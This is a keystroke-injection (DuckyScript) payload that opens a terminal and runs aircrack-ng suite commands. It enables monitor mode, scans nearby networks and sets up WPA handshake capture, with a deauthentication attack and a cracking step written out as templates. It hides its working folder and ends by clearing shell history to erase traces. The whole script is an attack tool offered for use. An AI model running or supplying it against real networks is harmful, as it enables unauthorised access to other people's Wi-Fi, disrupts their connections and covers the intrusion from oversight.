# ============================================
# WIFI HANDSHAKE - Capture WPA/WPA2 Handshakes
# ============================================
# Purpose: Capture WPA handshakes for later cracking
# Author: D3n14l0f53rv1c3
# Requires: Monitor mode capable adapter
# ============================================

DELAY 1000

# Open terminal
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000

# Create working directory
STRING mkdir -p /tmp/.wifi && cd /tmp/.wifi
ENTER
DELAY 300

# Enable monitor mode
STRING echo "=== ENABLE MONITOR MODE ==="
ENTER
DELAY 100
STRING sudo airmon-ng check kill
ENTER
DELAY 2000
STRING sudo airmon-ng start wlan0
ENTER
DELAY 3000

# Scan for targets
STRING echo "=== SCANNING FOR TARGET ==="
ENTER
DELAY 100
STRING sudo airodump-ng wlan0mon | tee scan.txt
ENTER
DELAY 15000

# Stop and show
STRING Ctrl+C
DELAY 1000

# Capture handshake on specific channel
STRING echo "=== CAPTURE HANDSHAKE ==="
ENTER
DELAY 100
STRING echo "Replace TARGET_BSSID and CHANNEL below"
ENTER
DELAY 100
STRING # sudo airodump-ng -c CHANNEL --bssid TARGET_BSSID -w capture wlan0mon
ENTER
DELAY 100
STRING echo "Wait for client to connect or use deauth"
ENTER
DELAY 100
STRING # sudo aireplay-ng -0 1 -a TARGET_BSSID wlan0mon
ENTER
DELAY 500

# Check for handshake
STRING echo "=== CHECK HANDSHAKE ==="
ENTER
DELAY 100
STRING # aircrack-ng capture-01.cap
ENTER
DELAY 500

# Clean up
STRING sudo airmon-ng stop wlan0mon
ENTER
DELAY 1000
STRING sudo systemctl restart NetworkManager
ENTER
DELAY 2000

STRING history -c
ENTER
STRING clear
ENTER

STRING echo "Handshake capture complete"
ENTER
